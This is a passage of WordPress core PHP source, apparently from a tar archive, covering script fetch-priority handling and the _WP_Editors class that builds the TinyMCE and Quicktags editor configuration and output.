$stored_results[ $handle ] = $eligible_strategies;
return $eligible_strategies;
}
/**
* Gets the highest fetch priority for a given script and all of its dependent scripts.
*
* @since 6.9.0
* @see self::filter_eligible_strategies()
* @see WP_Script_Modules::get_highest_fetchpriority()
*
* @param string $handle Script module ID.
* @param array<string, true> $checked Optional. An array of already checked script handles, used to avoid recursive loops.
* @param array<string, string> $stored_results Optional. An array of already computed max priority by handle, used to increase performance in large dependency lists.
* @return string|null Highest fetch priority for the script and its dependents.
*/
private function get_highest_fetchpriority_with_dependents( string $handle, array $checked = array(), array &$stored_results = array() ): ?string {
if ( isset( $stored_results[ $handle ] ) ) {
return $stored_results[ $handle ];
}
// If there is a recursive dependency, return early.
if ( isset( $checked[ $handle ] ) ) {
return null;
}
// Mark this handle as checked to guard against infinite recursion.
$checked[ $handle ] = true;
// Abort if the script is not enqueued or a dependency of an enqueued script.
if ( ! $this->query( $handle, 'enqueued' ) ) {
return null;
}
$fetchpriority = $this->get_data( $handle, 'fetchpriority' );
if ( ! $this->is_valid_fetchpriority( $fetchpriority ) ) {
$fetchpriority = 'auto';
}
static $priorities = array(
'low',
'auto',
'high',
);
$high_priority_index = count( $priorities ) - 1;
$highest_priority_index = (int) array_search( $fetchpriority, $priorities, true );
if ( $highest_priority_index !== $high_priority_index ) {
foreach ( $this->get_dependents( $handle ) as $dependent_handle ) {
$dependent_priority = $this->get_highest_fetchpriority_with_dependents( $dependent_handle, $checked, $stored_results );
if ( is_string( $dependent_priority ) ) {
$highest_priority_index = max(
$highest_priority_index,
(int) array_search( $dependent_priority, $priorities, true )
);
if ( $highest_priority_index === $high_priority_index ) {
break;
}
}
}
}
$stored_results[ $handle ] = $priorities[ $highest_priority_index ]; // @phpstan-ignore parameterByRef.type (We know the index is valid and that this will be a string.)
return $priorities[ $highest_priority_index ];
}
/**
* Gets data for inline scripts registered for a specific handle.
*
* @since 6.3.0
*
* @param string $handle Name of the script to get data for. Must be lowercase.
* @param string $position The position of the inline script.
* @return bool Whether the handle has an inline script (either before or after).
*/
private function has_inline_script( $handle, $position = null ) {
if ( $position && in_array( $position, array( 'before', 'after' ), true ) ) {
return (bool) $this->get_data( $handle, $position );
}
return (bool) ( $this->get_data( $handle, 'before' ) || $this->get_data( $handle, 'after' ) );
}
/**
* Resets class properties.
*
* @since 2.8.0
*/
public function reset() {
$this->do_concat = false;
$this->print_code = '';
$this->concat = '';
$this->concat_version = '';
$this->print_html = '';
$this->ext_version = '';
$this->ext_handles = '';
}
/**
* Gets a script-specific dependency warning message.
*
* @since 6.9.1
*
* @param string $handle Script handle with missing dependencies.
* @param string[] $missing_dependency_handles Missing dependency handles.
* @return string Formatted, localized warning message.
*/
protected function get_dependency_warning_message( $handle, $missing_dependency_handles ) {
return sprintf(
/* translators: 1: Script handle, 2: List of missing dependency handles. */
__( 'The script with the handle "%1$s" was enqueued with dependencies that are not registered: %2$s.' ),
$handle,
implode( wp_get_list_item_separator(), $missing_dependency_handles )
);
}
}
class-wp-editor.php 0000666 00000215217 15224151220 0010300 0 ustar 00 <?php
/**
* Facilitates adding of the WordPress editor as used on the Write and Edit screens.
*
* @package WordPress
* @since 3.3.0
*
* Private, not included by default. See wp_editor() in wp-includes/general-template.php.
*/
#[AllowDynamicProperties]
final class _WP_Editors {
public static $mce_locale;
private static $mce_settings = array();
private static $qt_settings = array();
private static $plugins = array();
private static $qt_buttons = array();
private static $ext_plugins;
private static $baseurl;
private static $first_init;
private static $this_tinymce = false;
private static $this_quicktags = false;
private static $has_tinymce = false;
private static $has_quicktags = false;
private static $has_medialib = false;
private static $editor_buttons_css = true;
private static $drag_drop_upload = false;
private static $translation;
private static $tinymce_scripts_printed = false;
private static $link_dialog_printed = false;
private function __construct() {}
/**
* Parse default arguments for the editor instance.
*
* @since 3.3.0
*
* @param string $editor_id HTML ID for the textarea and TinyMCE and Quicktags instances.
* Should not contain square brackets.
* @param array $settings {
* Array of editor arguments.
*
* @type bool $wpautop Whether to use wpautop(). Default true.
* @type bool $media_buttons Whether to show the Add Media/other media buttons.
* @type string $default_editor When both TinyMCE and Quicktags are used, set which
* editor is shown on page load. Default empty.
* @type bool $drag_drop_upload Whether to enable drag & drop on the editor uploading. Default false.
* Requires the media modal.
* @type string $textarea_name Give the textarea a unique name here. Square brackets
* can be used here. Default $editor_id.
* @type int $textarea_rows Number rows in the editor textarea. Default 20.
* @type string|int $tabindex Tabindex value to use. Default empty.
* @type string $tabfocus_elements The previous and next element ID to move the focus to
* when pressing the Tab key in TinyMCE. Default ':prev,:next'.
* @type string $editor_css Intended for extra styles for both Visual and Code editors.
* Should include `<style>` tags, and can use "scoped". Default empty.
* @type string $editor_class Extra classes to add to the editor textarea element. Default empty.
* @type bool $teeny Whether to output the minimal editor config. Examples include
* Press This and the Comment editor. Default false.
* @type bool $dfw Deprecated in 4.1. Unused.
* @type bool|array $tinymce Whether to load TinyMCE. Can be used to pass settings directly to
* TinyMCE using an array. Default true.
* @type bool|array $quicktags Whether to load Quicktags. Can be used to pass settings directly to
* Quicktags using an array. Default true.
* }
* @return array Parsed arguments array.
*/
public static function parse_settings( $editor_id, $settings ) {
/**
* Filters the wp_editor() settings.
*
* @since 4.0.0
*
* @see _WP_Editors::parse_settings()
*
* @param array $settings Array of editor arguments.
* @param string $editor_id Unique editor identifier, e.g. 'content'. Accepts 'classic-block'
* when called from block editor's Classic block.
*/
$settings = apply_filters( 'wp_editor_settings', $settings, $editor_id );
$set = wp_parse_args(
$settings,
array(
// Disable autop if the current post has blocks in it.
'wpautop' => ! has_blocks(),
'media_buttons' => true,
'default_editor' => '',
'drag_drop_upload' => false,
'textarea_name' => $editor_id,
'textarea_rows' => 20,
'tabindex' => '',
'tabfocus_elements' => ':prev,:next',
'editor_css' => '',
'editor_class' => '',
'teeny' => false,
'_content_editor_dfw' => false,
'tinymce' => true,
'quicktags' => true,
)
);
self::$this_tinymce = ( $set['tinymce'] && user_can_richedit() );
if ( self::$this_tinymce ) {
if ( str_contains( $editor_id, '[' ) ) {
self::$this_tinymce = false;
_deprecated_argument( 'wp_editor()', '3.9.0', 'TinyMCE editor IDs cannot have brackets.' );
}
}
self::$this_quicktags = (bool) $set['quicktags'];
if ( self::$this_tinymce ) {
self::$has_tinymce = true;
}
if ( self::$this_quicktags ) {
self::$has_quicktags = true;
}
if ( empty( $set['editor_height'] ) ) {
return $set;
}
if ( 'content' === $editor_id && empty( $set['tinymce']['wp_autoresize_on'] ) ) {
// A cookie (set when a user resizes the editor) overrides the height.
$cookie = (int) get_user_setting( 'ed_size' );
if ( $cookie ) {
$set['editor_height'] = $cookie;
}
}
if ( $set['editor_height'] < 50 ) {
$set['editor_height'] = 50;
} elseif ( $set['editor_height'] > 5000 ) {
$set['editor_height'] = 5000;
}
return $set;
}
/**
* Outputs the HTML for a single instance of the editor.
*
* @since 3.3.0
*
* @global WP_Screen $current_screen WordPress current screen object.
*
* @param string $content Initial content for the editor.
* @param string $editor_id HTML ID for the textarea and TinyMCE and Quicktags instances.
* Should not contain square brackets.
* @param array $settings See _WP_Editors::parse_settings() for description.
*/
public static function editor( $content, $editor_id, $settings = array() ) {
$set = self::parse_settings( $editor_id, $settings );
$editor_class = ' class="' . trim( esc_attr( $set['editor_class'] ) . ' wp-editor-area' ) . '"';
$tabindex = $set['tabindex'] ? ' tabindex="' . (int) $set['tabindex'] . '"' : '';
$default_editor = 'html';
$buttons = '';
$autocomplete = '';
$editor_id_attr = esc_attr( $editor_id );
if ( $set['drag_drop_upload'] ) {
self::$drag_drop_upload = true;
}
if ( ! empty( $set['editor_height'] ) ) {
$height = ' style="height: ' . (int) $set['editor_height'] . 'px"';
} else {
$height = ' rows="' . (int) $set['textarea_rows'] . '"';
}
if ( ! current_user_can( 'upload_files' ) ) {
$set['media_buttons'] = false;
}
if ( self::$this_tinymce ) {
$autocomplete = ' autocomplete="off"';
if ( self::$this_quicktags ) {
$default_editor = $set['default_editor'] ? $set['default_editor'] : wp_default_editor();
// 'html' is used for the "Code" editor tab.
if ( 'html' !== $default_editor ) {
$default_editor = 'tinymce';
}
$tmce_active = ( 'html' === $default_editor ) ? ' aria-pressed="true"' : '';
$html_active = ( 'html' === $default_editor ) ? '' : ' aria-pressed="true"';
$buttons .= '<button type="button" id="' . $editor_id_attr . '-tmce"' . $html_active . ' class="wp-switch-editor switch-tmce"' .
' data-wp-editor-id="' . $editor_id_attr . '">' . _x( 'Visual', 'Name for the Visual editor tab' ) . "</button>\n";
$buttons .= '<button type="button" id="' . $editor_id_attr . '-html"' . $tmce_active . ' class="wp-switch-editor switch-html"' .
' data-wp-editor-id="' . $editor_id_attr . '">' . _x( 'Code', 'Name for the Code editor tab (formerly Text)' ) . "</button>\n";
} else {
$default_editor = 'tinymce';
}
}
$switch_class = 'html' === $default_editor ? 'html-active' : 'tmce-active';
$wrap_class = 'wp-core-ui wp-editor-wrap ' . $switch_class;
if ( $set['_content_editor_dfw'] ) {
$wrap_class .= ' has-dfw';
}
echo '<div id="wp-' . $editor_id_attr . '-wrap" class="' . $wrap_class . '">';
if ( self::$editor_buttons_css ) {
wp_print_styles( 'editor-buttons' );
self::$editor_buttons_css = false;
}
if ( ! empty( $set['editor_css'] ) ) {
echo $set['editor_css'] . "\n";
}
if ( ! empty( $buttons ) || $set['media_buttons'] ) {
echo '<div id="wp-' . $editor_id_attr . '-editor-tools" class="wp-editor-tools hide-if-no-js">';
if ( $set['media_buttons'] ) {
self::$has_medialib = true;
if ( ! function_exists( 'media_buttons' ) ) {
require ABSPATH . 'wp-admin/includes/media.php';
}
echo '<div id="wp-' . $editor_id_attr . '-media-buttons" class="wp-media-buttons">';
/**
* Fires after the default media button(s) are displayed.
*
* @since 2.5.0
*
* @param string $editor_id Unique editor identifier, e.g. 'content'.
*/
do_action( 'media_buttons', $editor_id );
echo "</div>\n";
}
echo '<div class="wp-editor-tabs">' . $buttons . "</div>\n";
echo "</div>\n";
}
$quicktags_toolbar = '';
if ( self::$this_quicktags ) {
if ( 'content' === $editor_id && ! empty( $GLOBALS['current_screen'] ) && 'post' === $GLOBALS['current_screen']->base ) {
$toolbar_id = 'ed_toolbar';
} else {
$toolbar_id = 'qt_' . $editor_id_attr . '_toolbar';
}
$quicktags_toolbar = '<div id="' . $toolbar_id . '" class="quicktags-toolbar hide-if-no-js"></div>';
}
/**
* Filters the HTML markup output that displays the editor.
*
* @since 2.1.0
*
* @param string $output Editor's HTML markup.
*/
$the_editor = apply_filters(
'the_editor',
'<div id="wp-' . $editor_id_attr . '-editor-container" class="wp-editor-container">' .
$quicktags_toolbar .
'<textarea' . $editor_class . $height . $tabindex . $autocomplete . ' cols="40" name="' . esc_attr( $set['textarea_name'] ) . '" ' .
'id="' . $editor_id_attr . '">%s</textarea></div>'
);
// Prepare the content for the Visual or Code editor, only when TinyMCE is used (back-compat).
if ( self::$this_tinymce ) {
add_filter( 'the_editor_content', 'format_for_editor', 10, 2 );
}
/**
* Filters the default editor content.
*
* @since 2.1.0
*
* @param string $content Default editor content.
* @param string $default_editor The default editor for the current user.
* Either 'html' or 'tinymce'.
*/
$content = apply_filters( 'the_editor_content', $content, $default_editor );
// Remove the filter as the next editor on the same page may not need it.
if ( self::$this_tinymce ) {
remove_filter( 'the_editor_content', 'format_for_editor' );
}
// Back-compat for the `htmledit_pre` and `richedit_pre` filters.
if ( 'html' === $default_editor && has_filter( 'htmledit_pre' ) ) {
/** This filter is documented in wp-includes/deprecated.php */
$content = apply_filters_deprecated( 'htmledit_pre', array( $content ), '4.3.0', 'format_for_editor' );
} elseif ( 'tinymce' === $default_editor && has_filter( 'richedit_pre' ) ) {
/** This filter is documented in wp-includes/deprecated.php */
$content = apply_filters_deprecated( 'richedit_pre', array( $content ), '4.3.0', 'format_for_editor' );
}
if ( false !== stripos( $content, 'textarea' ) ) {
$content = preg_replace( '%</textarea%i', '</textarea', $content );
}
printf( $the_editor, $content );
echo "\n</div>\n\n";
self::editor_settings( $editor_id, $set );
}
/**
* @since 3.3.0
*
* @param string $editor_id Unique editor identifier, e.g. 'content'.
* @param array $set Array of editor arguments.
*/
public static function editor_settings( $editor_id, $set ) {
if ( empty( self::$first_init ) ) {
if ( is_admin() ) {
add_action( 'admin_print_footer_scripts', array( __CLASS__, 'editor_js' ), 50 );
add_action( 'admin_print_footer_scripts', array( __CLASS__, 'force_uncompressed_tinymce' ), 1 );
add_action( 'admin_print_footer_scripts', array( __CLASS__, 'enqueue_scripts' ), 1 );
} else {
add_action( 'wp_print_footer_scripts', array( __CLASS__, 'editor_js' ), 50 );
add_action( 'wp_print_footer_scripts', array( __CLASS__, 'force_uncompressed_tinymce' ), 1 );
add_action( 'wp_print_footer_scripts', array( __CLASS__, 'enqueue_scripts' ), 1 );
}
}
if ( self::$this_quicktags ) {
$qt_init = array(
'id' => $editor_id,
'buttons' => '',
);
if ( is_array( $set['quicktags'] ) ) {
$qt_init = array_merge( $qt_init, $set['quicktags'] );
}
if ( empty( $qt_init['buttons'] ) ) {
$qt_init['buttons'] = 'strong,em,link,block,del,ins,img,ul,ol,li,code,more,close';
}
if ( $set['_content_editor_dfw'] ) {
$qt_init['buttons'] .= ',dfw';
}
/**
* Filters the Quicktags settings.
*
* @since 3.3.0
*
* @param array $qt_init Quicktags settings.
* @param string $editor_id Unique editor identifier, e.g. 'content'.
*/
$qt_init = apply_filters( 'quicktags_settings', $qt_init, $editor_id );
self::$qt_settings[ $editor_id ] = $qt_init;
self::$qt_buttons = array_merge( self::$qt_buttons, explode( ',', $qt_init['buttons'] ) );
}
if ( self::$this_tinymce ) {
if ( empty( self::$first_init ) ) {
$baseurl = self::get_baseurl();
$mce_locale = self::get_mce_locale();
$ext_plugins = '';
if ( $set['teeny'] ) {
/**
* Filters the list of teenyMCE plugins.
*
* @since 2.7.0
* @since 3.3.0 The `$editor_id` parameter was added.
*
* @param array $plugins An array of teenyMCE plugins.
* @param string $editor_id Unique editor identifier, e.g. 'content'.
*/
$plugins = apply_filters(
'teeny_mce_plugins',
array(
'colorpicker',
'lists',
'fullscreen',
'image',
'wordpress',
'wpeditimage',
'wplink',
),
$editor_id
);
} else {
/**
* Filters the list of TinyMCE external plugins.
*
* The filter takes an associative array of external plugins for
* TinyMCE in the form 'plugin_name' => 'url'.
*
* The url should be absolute, and should include the js filename
* to be loaded. For example:
* 'myplugin' => 'http://mysite.com/wp-content/plugins/myfolder/mce_plugin.js'.
*
* If the external plugin adds a button, it should be added with
* one of the 'mce_buttons' filters.
*
* @since 2.5.0
* @since 5.3.0 The `$editor_id` parameter was added.
*
* @param array $external_plugins An array of external TinyMCE plugins.
* @param string $editor_id Unique editor identifier, e.g. 'content'. Accepts 'classic-block'
* when called from block editor's Classic block.
*/
$mce_external_plugins = apply_filters( 'mce_external_plugins', array(), $editor_id );
$plugins = array(
'charmap',
'colorpicker',
'hr',
'lists',
'media',
'paste',
'tabfocus',
'textcolor',
'fullscreen',
'wordpress',
'wpautoresize',
'wpeditimage',
'wpemoji',
'wpgallery',
'wplink',
'wpdialogs',
'wptextpattern',
'wpview',
);
if ( ! self::$has_medialib ) {
$plugins[] = 'image';
}
/**
* Filters the list of default TinyMCE plugins.
*
* The filter specifies which of the default plugins included
* in WordPress should be added to the TinyMCE instance.
*
* @since 3.3.0
* @since 5.3.0 The `$editor_id` parameter was added.
*
* @param array $plugins An array of default TinyMCE plugins.
* @param string $editor_id Unique editor identifier, e.g. 'content'. Accepts 'classic-block'
* when called from block editor's Classic block.
*/
$plugins = array_unique( apply_filters( 'tiny_mce_plugins', $plugins, $editor_id ) );
$key = array_search( 'spellchecker', $plugins, true );
if ( false !== $key ) {
/*
* Remove 'spellchecker' from the internal plugins if added with 'tiny_mce_plugins' filter to prevent errors.
* It can be added with 'mce_external_plugins'.
*/
unset( $plugins[ $key ] );
}
if ( ! empty( $mce_external_plugins ) ) {
/**
* Filters the translations loaded for external TinyMCE 3.x plugins.
*
* The filter takes an associative array ('plugin_name' => 'path')
* where 'path' is the include path to the file.
*
* The language file should follow the same format as wp_mce_translation(),
* and should define a variable ($strings) that holds all translated strings.
*
* @since 2.5.0
* @since 5.3.0 The `$editor_id` parameter was added.
*
* @param array $translations Translations for external TinyMCE plugins.
* @param string $editor_id Unique editor identifier, e.g. 'content'.
*/
$mce_external_languages = apply_filters( 'mce_external_languages', array(), $editor_id );
$loaded_langs = array();
$strings = '';
if ( ! empty( $mce_external_languages ) ) {
foreach ( $mce_external_languages as $name => $path ) {
if ( @is_file( $path ) && @is_readable( $path ) ) {
include_once $path;
$ext_plugins .= $strings . "\n";
$loaded_langs[] = $name;
}
}
}
foreach ( $mce_external_plugins as $name => $url ) {
if ( in_array( $name, $plugins, true ) ) {
unset( $mce_external_plugins[ $name ] );
continue;
}
$url = set_url_scheme( $url );
$mce_external_plugins[ $name ] = $url;
$plugurl = dirname( $url );
$strings = '';
// Try to load langs/[locale].js and langs/[locale]_dlg.js.
if ( ! in_array( $name, $loaded_langs, true ) ) {
$path = str_replace( content_url(), '', $plugurl );
$path = realpath( WP_CONTENT_DIR . $path . '/langs/' );
if ( ! $path ) {
continue;
}
$path = trailingslashit( $path );
if ( @is_file( $path . $mce_locale . '.js' ) ) {
$strings .= @file_get_contents( $path . $mce_locale . '.js' ) . "\n";
}
if ( @is_file( $path . $mce_locale . '_dlg.js' ) ) {
$strings .= @file_get_contents( $path . $mce_locale . '_dlg.js' ) . "\n";
}
if ( 'en' !== $mce_locale && empty( $strings ) ) {
if ( @is_file( $path . 'en.js' ) ) {
$str1 = @file_get_contents( $path . 'en.js' );
$strings .= preg_replace( '/([\'"])en\./', '$1' . $mce_locale . '.', $str1, 1 ) . "\n";
}
if ( @is_file( $path . 'en_dlg.js' ) ) {
$str2 = @file_get_contents( $path . 'en_dlg.js' );
$strings .= preg_replace( '/([\'"])en\./', '$1' . $mce_locale . '.', $str2, 1 ) . "\n";
}
}
if ( ! empty( $strings ) ) {
$ext_plugins .= "\n" . $strings . "\n";
}
}
$ext_plugins .= 'tinyMCEPreInit.load_ext("' . $plugurl . '", "' . $mce_locale . '");' . "\n";
}
}
}
self::$plugins = $plugins;
self::$ext_plugins = $ext_plugins;
$settings = self::default_settings();
$settings['plugins'] = implode( ',', $plugins );
if ( ! empty( $mce_external_plugins ) ) {
$settings['external_plugins'] = wp_json_encode( $mce_external_plugins );
}
/** This filter is documented in wp-admin/includes/media.php */
if ( apply_filters( 'disable_captions', '' ) ) {
$settings['wpeditimage_disable_captions'] = true;
}
$mce_css = $settings['content_css'];
/*
* The `editor-style.css` added by the theme is generally intended for the editor instance on the Edit Post screen.
* Plugins that use wp_editor() on the front-end can decide whether to add the theme stylesheet
* by using `get_editor_stylesheets()` and the `mce_css` or `tiny_mce_before_init` filters, see below.
*/
if ( is_admin() ) {
$editor_styles = get_editor_stylesheets();
if ( ! empty( $editor_styles ) ) {
// Force urlencoding of commas.
foreach ( $editor_styles as $key => $url ) {
if ( str_contains( $url, ',' ) ) {
$editor_styles[ $key ] = str_replace( ',', '%2C', $url );
}
}
$mce_css .= ',' . implode( ',', $editor_styles );
}
}
/**
* Filters the comma-delimited list of stylesheets to load in TinyMCE.
*
* @since 2.1.0
*
* @param string $stylesheets Comma-delimited list of stylesheets.
*/
$mce_css = trim( apply_filters( 'mce_css', $mce_css ), ' ,' );
if ( ! empty( $mce_css ) ) {
$settings['content_css'] = $mce_css;
} else {
unset( $settings['content_css'] );
}
self::$first_init = $settings;
}
if ( $set['teeny'] ) {
$mce_buttons = array(
'bold',
'italic',
'underline',
'blockquote',
'strikethrough',
'bullist',
'numlist',
'alignleft',
'aligncenter',
'alignright',
'undo',
'redo',
'link',
'fullscreen',
);
/**
* Filters the list of teenyMCE buttons (Code tab).
*
* @since 2.7.0
* @since 3.3.0 The `$editor_id` parameter was added.
*
* @param array $mce_buttons An array of teenyMCE buttons.
* @param string $editor_id Unique editor identifier, e.g. 'content'.
*/
$mce_buttons = apply_filters( 'teeny_mce_buttons', $mce_buttons, $editor_id );
$mce_buttons_2 = array();
$mce_buttons_3 = array();
$mce_buttons_4 = array();
} else {
$mce_buttons = array(
'formatselect',
'bold',
'italic',
'bullist',
'numlist',
'blockquote',
'alignleft',
'aligncenter',
'alignright',
'link',
'wp_more',
'spellchecker',
);
if ( ! wp_is_mobile() ) {
if ( $set['_content_editor_dfw'] ) {
$mce_buttons[] = 'wp_adv';
$mce_buttons[] = 'dfw';
} else {
$mce_buttons[] = 'fullscreen';
$mce_buttons[] = 'wp_adv';
}
} else {
$mce_buttons[] = 'wp_adv';
}
/**
* Filters the first-row list of TinyMCE buttons (Visual tab).
*
* @since 2.0.0
* @since 3.3.0 The `$editor_id` parameter was added.
*
* @param array $mce_buttons First-row list of buttons.
* @param string $editor_id Unique editor identifier, e.g. 'content'. Accepts 'classic-block'
* when called from block editor's Classic block.
*/
$mce_buttons = apply_filters( 'mce_buttons', $mce_buttons, $editor_id );
$mce_buttons_2 = array(
'strikethrough',
'hr',
'forecolor',
'pastetext',
'removeformat',
'charmap',
'outdent',
'indent',
'undo',
'redo',
);
if ( ! wp_is_mobile() ) {
$mce_buttons_2[] = 'wp_help';
}
/**
* Filters the second-row list of TinyMCE buttons (Visual tab).
*
* @since 2.0.0
* @since 3.3.0 The `$editor_id` parameter was added.
*
* @param array $mce_buttons_2 Second-row list of buttons.
* @param string $editor_id Unique editor identifier, e.g. 'content'. Accepts 'classic-block'
* when called from block editor's Classic block.
*/
$mce_buttons_2 = apply_filters( 'mce_buttons_2', $mce_buttons_2, $editor_id );
/**
* Filters the third-row list of TinyMCE buttons (Visual tab).
*
* @since 2.0.0
* @since 3.3.0 The `$editor_id` parameter was added.
*
* @param array $mce_buttons_3 Third-row list of buttons.
* @param string $editor_id Unique editor identifier, e.g. 'content'. Accepts 'classic-block'
* when called from block editor's Classic block.
*/
$mce_buttons_3 = apply_filters( 'mce_buttons_3', array(), $editor_id );
/**
* Filters the fourth-row list of TinyMCE buttons (Visual tab).
*
* @since 2.5.0
* @since 3.3.0 The `$editor_id` parameter was added.
*
* @param array $mce_buttons_4 Fourth-row list of buttons.
* @param string $editor_id Unique editor identifier, e.g. 'content'. Accepts 'classic-block'
* when called from block editor's Classic block.
*/
$mce_buttons_4 = apply_filters( 'mce_buttons_4', array(), $editor_id );
}
$body_class = $editor_id;
$post = get_post();
if ( $post ) {
$body_class .= ' post-type-' . sanitize_html_class( $post->post_type ) . ' post-status-' . sanitize_html_class( $post->post_status );
if ( post_type_supports( $post->post_type, 'post-formats' ) ) {
$post_format = get_post_format( $post );
if ( $post_format && ! is_wp_error( $post_format ) ) {
$body_class .= ' post-format-' . sanitize_html_class( $post_format );
} else {
$body_class .= ' post-format-standard';
}
}
$page_template = get_page_template_slug( $post );
if ( false !== $page_template ) {
$page_template = empty( $page_template ) ? 'default' : str_replace( '.', '-', basename( $page_template, '.php' ) );
$body_class .= ' page-template-' . sanitize_html_class( $page_template );
}
}
$body_class .= ' locale-' . sanitize_html_class( strtolower( str_replace( '_', '-', get_user_locale() ) ) );
if ( ! empty( $set['tinymce']['body_class'] ) ) {
$body_class .= ' ' . $set['tinymce']['body_class'];
unset( $set['tinymce']['body_class'] );
}
$mce_init = array(
'selector' => "#$editor_id",
'wpautop' => (bool) $set['wpautop'],
'indent' => ! $set['wpautop'],
'toolbar1' => implode( ',', $mce_buttons ),
'toolbar2' => implode( ',', $mce_buttons_2 ),
'toolbar3' => implode( ',', $mce_buttons_3 ),
'toolbar4' => implode( ',', $mce_buttons_4 ),
'tabfocus_elements' => $set['tabfocus_elements'],
'body_class' => $body_class,
);
// Merge with the first part of the init array.
$mce_init = array_merge( self::$first_init, $mce_init );
if ( is_array( $set['tinymce'] ) ) {
$mce_init = array_merge( $mce_init, $set['tinymce'] );
}
/*
* For people who really REALLY know what they're doing with TinyMCE
* You can modify $mceInit to add, remove, change elements of the config
* before tinyMCE.init. Setting "valid_elements", "invalid_elements"
* and "extended_valid_elements" can be done through this filter. Best
* is to use the default cleanup by not specifying valid_elements,
* as TinyMCE checks against the full set of HTML 5.0 elements and attributes.
*/
if ( $set['teeny'] ) {
/**
* Filters the teenyMCE config before init.
*
* @since 2.7.0
* @since 3.3.0 The `$editor_id` parameter was added.
*
* @param array $mce_init An array with teenyMCE config.
* @param string $editor_id Unique editor identifier, e.g. 'content'.
*/
$mce_init = apply_filters( 'teeny_mce_before_init', $mce_init, $editor_id );
} else {
/**
* Filters the TinyMCE config before init.
*
* @since 2.5.0
* @since 3.3.0 The `$editor_id` parameter was added.
*
* @param array $mce_init An array with TinyMCE config.
* @param string $editor_id Unique editor identifier, e.g. 'content'. Accepts 'classic-block'
* when called from block editor's Classic block.
*/
$mce_init = apply_filters( 'tiny_mce_before_init', $mce_init, $editor_id );
}
if ( empty( $mce_init['toolbar3'] ) && ! empty( $mce_init['toolbar4'] ) ) {
$mce_init['toolbar3'] = $mce_init['toolbar4'];
$mce_init['toolbar4'] = '';
}
self::$mce_settings[ $editor_id ] = $mce_init;
} // End if self::$this_tinymce.
}
/**
* @since 3.3.0
*
* @param array $init
* @return string
*/
private static function _parse_init( $init ) {
$options = '';
foreach ( $init as $key => $value ) {
if ( is_bool( $value ) ) {
$val = $value ? 'true' : 'false';
$options .= $key . ':' . $val . ',';
continue;
} elseif ( ! empty( $value ) && is_string( $value ) && (
( '{' === $value[0] && '}' === $value[ strlen( $value ) - 1 ] ) ||
( '[' === $value[0] && ']' === $value[ strlen( $value ) - 1 ] ) ||
preg_match( '/^\(?function ?\(/', $value ) ) ) {
$options .= $key . ':' . $value . ',';
continue;
}
$options .= $key . ':"' . $value . '",';
}
return '{' . trim( $options, ' ,' ) . '}';
}
/**
* @since 3.3.0
*
* @param bool $default_scripts Optional. Whether default scripts should be enqueued. Default false.
*/
public static function enqueue_scripts( $default_scripts = false ) {
if ( $default_scripts || self::$has_tinymce ) {
wp_enqueue_script( 'editor' );
}
if ( $default_scripts || self::$has_quicktags ) {
wp_enqueue_script( 'quicktags' );
wp_enqueue_style( 'buttons' );
}
if ( $default_scripts || in_array( 'wplink', self::$plugins, true ) || in_array( 'link', self::$qt_buttons, true ) ) {
wp_enqueue_script( 'wplink' );
wp_enqueue_script( 'jquery-ui-autocomplete' );
}
if ( self::$has_medialib ) {
add_thickbox();
wp_enqueue_script( 'media-upload' );
wp_enqueue_script( 'wp-embed' );
} elseif ( $default_scripts ) {
wp_enqueue_script( 'media-upload' );
}
/**
* Fires when scripts and styles are enqueued for the editor.
*
* @since 3.9.0
*
* @param array $to_load An array containing boolean values whether TinyMCE
* and Quicktags are being loaded.
*/
do_action(
'wp_enqueue_editor',
array(
'tinymce' => ( $default_scripts || self::$has_tinymce ),
'quicktags' => ( $default_scripts || self::$has_quicktags ),
)
);
}
/**
* Enqueue all editor scripts.
* For use when the editor is going to be initialized after page load.
*
* @since 4.8.0
*/
public static function enqueue_default_editor() {
// We are past the point where scripts can be enqueued properly.
if ( did_action( 'wp_enqueue_editor' ) ) {
return;
}
self::enqueue_scripts( true );
// Also add wp-includes/css/editor.css.
wp_enqueue_style( 'editor-buttons' );
if ( is_admin() ) {
add_action( 'admin_print_footer_scripts', array( __CLASS__, 'force_uncompressed_tinymce' ), 1 );
add_action( 'admin_print_footer_scripts', array( __CLASS__, 'print_default_editor_scripts' ), 45 );
} else {
add_action( 'wp_print_footer_scripts', array( __CLASS__, 'force_uncompressed_tinymce' ), 1 );
add_action( 'wp_print_footer_scripts', array( __CLASS__, 'print_default_editor_scripts' ), 45 );
}
}
/**
* Print (output) all editor scripts and default settings.
* For use when the editor is going to be initialized after page load.
*
* @since 4.8.0
*/
public static function print_default_editor_scripts() {
$user_can_richedit = user_can_richedit();
if ( $user_can_richedit ) {
$settings = self::default_settings();
$settings['toolbar1'] = 'bold,italic,bullist,numlist,link';
$settings['wpautop'] = false;
$settings['indent'] = true;
$settings['elementpath'] = false;
if ( is_rtl() ) {
$settings['directionality'] = 'rtl';
}
/*
* In production all plugins are loaded (they are in wp-editor.js.gz).
* The 'wpview', 'wpdialogs', and 'media' TinyMCE plugins are not initialized by default.
* Can be added from js by using the 'wp-before-tinymce-init' event.
*/
$settings['plugins'] = implode(
',',
array(
'charmap',
'colorpicker',
'hr',
'lists',
'paste',
'tabfocus',
'textcolor',
'fullscreen',
'wordpress',
'wpautoresize',
'wpeditimage',
'wpemoji',
'wpgallery',
'wplink',
'wptextpattern',
)
);
$settings = self::_parse_init( $settings );
} else {
$settings = '{}';
}
?>
<script type="text/javascript">
window.wp = window.wp || {};
window.wp.editor = window.wp.editor || {};
window.wp.editor.getDefaultSettings = function() {
return {
tinymce: <?php echo $settings; ?>,
quicktags: {
buttons: 'strong,em,link,ul,ol,li,code'
}
};
};
<?php
if ( $user_can_richedit ) {
$suffix = SCRIPT_DEBUG ? '' : '.min';
$baseurl = self::get_baseurl();
?>
var tinyMCEPreInit = {
baseURL: "<?php echo $baseurl; ?>",
suffix: "<?php echo $suffix; ?>",
mceInit: {},
qtInit: {},
load_ext: function(url,lang){var sl=tinymce.ScriptLoader;sl.markDone(url+'/langs/'+lang+'.js');sl.markDone(url+'/langs/'+lang+'_dlg.js');}
};
<?php
}
?>
</script>
<?php
if ( $user_can_richedit ) {
self::print_tinymce_scripts();
}
/**
* Fires when the editor scripts are loaded for later initialization,
* after all scripts and settings are printed.
*
* @since 4.8.0
*/
do_action( 'print_default_editor_scripts' );
self::wp_link_dialog();
}
/**
* Returns the TinyMCE locale.
*
* @since 4.8.0
*
* @return string
*/
public static function get_mce_locale() {
if ( empty( self::$mce_locale ) ) {
$mce_locale = get_user_locale();
self::$mce_locale = empty( $mce_locale ) ? 'en' : strtolower( substr( $mce_locale, 0, 2 ) ); // ISO 639-1.
}
